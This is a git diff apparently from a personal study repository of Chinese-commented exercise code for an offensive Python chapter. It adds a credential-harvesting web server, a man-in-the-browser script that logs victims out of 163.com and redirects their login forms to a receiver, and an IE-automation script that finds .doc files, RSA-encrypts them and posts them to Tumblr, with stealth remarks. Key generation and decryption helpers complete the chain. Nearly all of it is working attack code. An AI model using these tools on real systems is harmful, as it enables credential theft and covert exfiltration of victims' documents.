litheory
diff --git a/‎我手敲的代码(中文注释)/chapter9/VCForPython27.msi
83.8 MB b/‎我手敲的代码(中文注释)/chapter9/VCForPython27.msi
83.8 MB
diff --git a/‎我手敲的代码(中文注释)/chapter9/cred_server.py
Lines changed: 33 additions & 0 deletions b/‎我手敲的代码(中文注释)/chapter9/cred_server.py
Lines changed: 33 additions & 0 deletions
diff --git a/‎我手敲的代码(中文注释)/chapter9/decryptor.py
Lines changed: 32 additions & 0 deletions b/‎我手敲的代码(中文注释)/chapter9/decryptor.py
Lines changed: 32 additions & 0 deletions
diff --git a/‎我手敲的代码(中文注释)/chapter9/ie_exfil.py
Lines changed: 173 additions & 0 deletions b/‎我手敲的代码(中文注释)/chapter9/ie_exfil.py
Lines changed: 173 additions & 0 deletions
diff --git a/‎我手敲的代码(中文注释)/chapter9/keygen.py
Lines changed: 22 additions & 0 deletions b/‎我手敲的代码(中文注释)/chapter9/keygen.py
Lines changed: 22 additions & 0 deletions
diff --git a/‎我手敲的代码(中文注释)/chapter9/mitb.py
Lines changed: 85 additions & 0 deletions b/‎我手敲的代码(中文注释)/chapter9/mitb.py
Lines changed: 85 additions & 0 deletions
diff --git a/‎我手敲的代码(中文注释)/chapter9/pycrypto-2.6.1.tar.gz
436 KB b/‎我手敲的代码(中文注释)/chapter9/pycrypto-2.6.1.tar.gz
436 KB
@@ -0,0 +1,33 @@
+#-*- coding:utf8 -*-  
+
+"""
+@version: 
+@author: giantbranch
+@file: cred_server.py
+@time: 2016/3/11 22:26
+"""
+
+import SimpleHTTPServer
+import SocketServer
+import urllib
+
+
+
+class CredRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
+    # 处理POST请求
+    def do_POST(self):
+        # 获取包长度
+        content_length = int(self.headers['Content-Length'])
+        # 读取这么多长度的内容并打印出来，登录凭证就出来了
+        creds = self.rfile.read(content_length).decode('utf-8')
+        print creds
+        # 跟着获取用户访问的原始站点，进行301重定向，并设置头部
+        site = self.path[1:]
+        self.send_response(301)
+        self.send_header("Location",urllib.unquote(site))
+        self.end_headers()
+
+# 初始化监听地址和端口，并调用一个类来处理请求，其实就是处理POST请求
+server = SocketServer.TCPServer(('0.0.0.0', 8080), CredRequestHandler)
+# 永远监听
+server.serve_forever()
@@ -0,0 +1,32 @@
+#-*- coding:utf8 -*-  
+
+"""
+@version: 
+@author: giantbranch
+@file: decryptor.py
+@time: 2016/3/13 10:21
+"""
+
+import zlib
+import base64
+from Crypto.PublicKey import RSA
+from Crypto.Cipher import PKCS1_OAEP
+
+private_key = ""
+
+rsakey = RSA.importKey(private_key)
+rsakey = PKCS1_OAEP.new(rsakey)
+
+chunk_size = 256
+offset = 0
+decrypted = ""
+encrypted = base64.b64decode(encrypted)
+
+while offset < len(encrypted):
+    decrypted += rsakey.decrypt(encrypted[offset:offset+chunk_size])
+    offset += chunk_size
+
+# 解压负载
+plaintext = zlib.decompress(decrypted)
+
+print plaintext
@@ -0,0 +1,173 @@
+#-*- coding:utf8 -*-  
+
+"""
+@version: 
+@author: giantbranch
+@file: ie_exfil.py
+@time: 2016/3/11 23:13
+"""
+
+import win32com.client
+import os
+import fnmatch
+import time
+import random
+import zlib
+
+from Crypto.PublicKey import RSA
+from Crypto.Cipher import PKCS1_OAEP
+
+doc_type = ".doc"
+username = ""
+password = ""
+
+public_key = "-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnqDNZMxg2xp620nt0QTwJ0Bv7pRJvdV0Yems1JxnOqA3uCrdZe/fXpD7+kUFRZ6sCZnvcicuyGDMKszvIK75/QWLLCIoMt5cPk1gqsN1djFmG95k63Z/fU1CZbcWa3Kdzo5Ca0Mu262y/n0q5r8TT4khKNOsjeyup1Fk3ll+/DrUrMqxXmX6YK/tGtJhzT+wK55zoZakVR+9S8wHQq27Y+y2xhS2aq1sxZEnYM3/MGerH8nRZZ4WLf2bqMUHywT80cVCxkHb7J5dKNELx4PRIWPbYdmRxHljJpK2kt383yoIQihK5qKkj2SuBFsvoVNEwq4hzVGQTBNn43BRVj8BpwIDAQAB-----END PUBLIC KEY-----"
+
+
+def wait_for_browser(browser):
+    # 等待浏览器加载完一个页面
+    while browser.ReadyState != 4 and browser.ReadyState != "complete":
+        time.sleep(0.1)
+
+    return
+
+def encrypt_string(plaintext):
+    # 设置块大小
+    chunk_size = 256
+    print "Compressing: %d bytes" % len(plaintext)
+    # 首先调用zlib进行压缩
+    plaintext = zlib.compress(plaintext)
+
+    print "Encrypting %d bytes" % len(plaintext)
+
+    # 利用公钥建立RSA公钥加密对象
+    rsakey = RSA.importKey(public_key)
+    rsakey = PKCS1_OAEP.new(rsakey)
+
+    encrypted = ""
+    offset = 0
+
+    # 对文件内容进行每256个字节为一块循环加密
+    while offset < len(plaintext):
+        # 获取某个256字节
+        chunk = plaintext[offset:offset+chunk_size]
+        # 若到最后不够256字节，则用空格补够
+        if len(chunk) % chunk_size != 0:
+            chunk += " " * (chunk_size - len(chunk))
+        # 将已加密的连起来
+        encrypted += rsakey.encrypt(chunk)
+        # 偏移增加
+        offset += chunk_size
+    # 对加密后的进行base64编码
+    encrypted = encrypted.encode("base64")
+    # 输出最后加密后的长度
+    print "Base64 encodeed crypto: %d" % len(encrypted)
+    # 返回加密后内容
+    return encrypted
+
+def encrypt_post(filename):
+
+    # 打开并读取文件
+    fd = open(filename, "rb")
+    contents = fd.read()
+    fd.close()
+    # 分别加密文件名和内容
+    encrypt_title = encrypt_string(filename)
+    encrypt_body = encrypt_string(contents)
+
+    return encrypt_title, encrypt_body
+
+# 随机休眠一段时间
+def random_sleep():
+    time.sleep(random.randint(5,10))
+    return
+
+def login_to_tumblr(ie):
+
+    # 解析文档中的所有元素
+    full_doc = ie.Document.all
+    # 迭代每个元素来查找登陆表单
+    for i in full_doc:
+        if i.id == "signup_email":
+            i.setAttribute("value", username)
+        elif i.id == "signup_password":
+            i.setAttribute("value", password)
+
+    random_sleep()
+
+    try:
+        # 你会遇到不同的登陆主页
+        if ie.Document.forms[0].id == "signup_form":
+            ie.Document.forms[0].submit()
+        else:
+            ie.Document.forms[1].submit()
+    except IndexError, e:
+        pass
+
+    random_sleep()
+
+    # 登陆表单是登陆页面的第二个表单
+    wait_for_browser(ie)
+    return
+
+def post_to_tumblr(ie, title, post):
+    full_doc = ie.Document.all
+
+    for i in full_doc:
+        if i.id == "post_one":
+            i.setAttribute("value", title)
+            title_box = i
+        elif i.id == "post_two":
+            i.setAttribute("innerHTML", post)
+        elif i.id == "create_post":
+            print "Found post button"
+            post_form = i
+            i.focus()
+
+    random_sleep()
+    title_box.focus()
+    random_sleep()
+
+    post_form.childran[0].click()
+    wait_for_browser(ie)
+
+    random_sleep()
+
+    return
+
+def exfiltrate(document_path):
+    # 创建IE实例化对象
+    ie = win32com.client.Dispatch("InternetExplorer.Application")
+    # 调试阶段设置为1，实际设置为0，以增加隐蔽性
+    ie.Visible = 1
+
+    # 访问tumblr站点并登陆
+    ie.Navigate("http://www.tumblr.com/login")
+    wait_for_browser(ie)
+
+    print "Logging in ..."
+    login_to_tumblr(ie)
+    print "Logged in ... navigating"
+
+    ie.Navigate("https://www.tumblr.com/new/text")
+    wait_for_browser(ie)
+
+    # 加密文件
+    title,body = encrypt_post(document_path)
+
+    print "Creating new post..."
+    post_to_tumblr(ie, title, body)
+    print "Posted!"
+
+    # 销毁IE实例
+    ie.Quit()
+    ie = None
+
+
+# 用户文档检索的主循环
+for parent, directories, filenames in os.walk("C:\\test\\"):
+    for filename in fnmatch.filter(filenames, "*%s" % doc_type):
+        document_path = os.path.join(parent, filename)
+        print "Found: %s" % document_path
+        exfiltrate(document_path)
+        raw_input("Continue?")
@@ -0,0 +1,22 @@
+#-*- coding:utf8 -*-  
+
+"""
+@version: 
+@author: giantbranch
+@file: keygen.py
+@time: 2016/3/13 9:55
+"""
+
+from Crypto.PublicKey import RSA
+
+# 随机地生成一个新的RSA key对象
+new_key = RSA.generate(2048, e = 65537)
+
+# 导出公钥和私钥
+public_key = new_key.publickey().exportKey("PEM")
+private_key = new_key.exportKey("PEM")
+
+# 分别输出公钥和私钥
+print public_key
+print private_key
+
@@ -0,0 +1,85 @@
+#-*- coding:utf8 -*-  
+
+"""
+@version: 
+@author: giantbranch
+@file: mitb.py
+@time: 2016/3/11 12:09
+"""
+
+import win32com.client
+import time
+import urlparse
+import urllib
+
+# 接受窃取的数据的服务器
+data_receiver = "http://127.0.0.1:8080/"
+
+# 目标站点
+target_sites = {}
+
+target_sites["www.163.com"] = {
+    "logout_url"    : "",
+    "logout_form"   : None,
+    "logout_form_index":0,
+    "owned"         :False
+}
+target_sites["reg.163.com"] = {
+    "logout_url"    : "",
+    "logout_form"   : None,
+    "logout_form_index":0,
+    "owned"         :False
+}
+
+
+
+# IE浏览器类的ID号
+clsid = '{9BA05972-F6A8-11CF-A442-00A0C90A8F39}'
+
+# COM对象实例化，就是上面那个
+windows = win32com.client.Dispatch(clsid)
+
+def wait_for_browser(browser):
+    # 等待浏览器加载完一个页面
+    while browser.ReadyState != 4 and browser.ReadyState != "complete":
+        time.sleep(0.1)
+
+    return
+
+while True:
+
+    for browser in windows:
+        url = urlparse.urlparse(browser.LocationUrl)
+        if url.hostname in target_sites:
+            #print "i am in"
+            if target_sites[url.hostname]["owned"]:
+                continue
+
+            # 如果有一个URL，我们可以重定向
+            if target_sites[url.hostname]["logout_url"]:
+                browser.Navigate(target_sites[url.hostname]["logout_url"])
+                wait_for_browser(browser)
+            else:
+                # 检索文件中的所有元素
+                full_doc = browser.Document.all
+                # 迭代寻找注销表单
+                for i in full_doc:
+                    try:
+                        # 找到退出登陆的表单并提交
+                        if i.id == target_sites[url.hostname]["logout_form"]:
+                            i.submit()
+                            wait_for_browser(browser)
+                    except:
+                        pass
+            # 现在来修改登陆表单
+            try:
+                login_index = target_sites[url.hostname]["login_form_index"]
+                login_page = urllib.quote(browser.LocationUrl)
+                browser.Document.forms[login_index].action = "%s%s" % (data_receiver, login_page)
+                target_sites[url.hostname]["owned"] = True
+            except:
+                pass
+        time.sleep(5)
+
+
+